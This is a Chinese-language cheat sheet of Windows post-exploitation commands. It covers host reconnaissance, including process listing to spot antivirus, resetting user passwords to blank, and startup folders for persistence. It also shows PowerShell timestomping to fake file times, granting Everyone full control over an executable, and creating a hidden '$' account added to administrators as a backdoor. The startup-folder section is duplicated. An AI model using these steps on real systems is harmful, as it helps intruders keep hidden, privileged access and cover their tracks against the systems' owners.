信息收集

whoami    // 查看当前用户权限
net user    // 查看机器里面的用户
net user <username>      // 查看用户的具体信息
systeminfo     // 查看机器的具体信息 版本号、打的补丁、域信息
arp -a      // 查看arp缓存表
ipconfig    // 查看机器的网卡信息
tasklist /svc     // 查看机器的进程信(判断杀软)

net user 修改用户账号密码

net user haha "" // 设置账号haha的密码是空密码
net user haha haha..123 // 设置账号jack的密码是haha..123

Win开启自启动目录

用户开机自启
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
系统开机自启
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Win开启自启动目录

用户开机自启
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
系统开机自启
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

命令复制单个文件

copy C:\1.txt F:\ // 将C盘的1.txt 复制到F盘

命令复制整个目录

xcopy C:\qwe123 F:\ /E // 将C盘的qwe123目录复制到F盘

cmd调用powershell修改文件时间

powershell -command "(Get-Item ccc.js).LastWriteTime = '2021-10-18 12:16:30'"
powershell -command "(Get-Item qqq.exe).LastWriteTime = '2023-01-01 15:31:08'"
(Get-Item filename).CreationTime = '2021-10-18 12:16:30' // 文件的创建时间
(Get-Item filename).LastAccessTime = '2023-01-01 15:31:08' // 文件的访问时间

查看当前在线用户

query user
query session

杀死进程

taskkill /IM cmd.exe

全盘搜索文件

dir C:\111.exe /s >>1.txt

cmd 打包压缩包

tar -czvf archive.tar.gz /path/to/directory
tar -czvf archive.tar.gz directory1 directory2 directory3
这个命令将会创建一个名为archive.tar.gz的压缩包，其中包含了/path/to/directory目录下的所有文件。
zip -r archive.zip /path/to/directory

设置文件为everyone可下载

icacls 111.exe /grant:r everyone:f

删除文件命令

del C:\Users\haha\Documents\111.txt

添加隐藏后门用户

net user domain$ qwe123.. /add 建立用户 用户名后加$表示隐藏用户
net localgroup administrators domain$ /add 把用户添加到管理员组中